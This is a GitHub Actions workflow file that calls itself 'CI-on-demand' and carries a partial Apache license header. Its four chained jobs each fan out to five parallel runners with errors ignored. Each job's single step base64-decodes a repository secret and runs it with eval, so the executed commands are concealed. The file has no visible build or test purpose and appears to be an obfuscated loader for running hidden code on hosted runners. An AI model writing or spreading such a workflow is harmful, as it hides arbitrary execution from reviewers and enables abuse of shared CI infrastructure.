# Licensed to the Apache Software Foundation (ASF) under one

name: CI-on-demand
on: 
  workflow_dispatch:
 
jobs:
  setup-jobs:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    steps:
      - name: Command
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"

  progress-01:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    needs: setup-jobs
    steps:
      - name: Command
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"

  progress-02:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    needs: progress-01
    steps:
      - name: Command
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"

  progress-03:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    needs: progress-02
    steps:
      - name: Command
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"
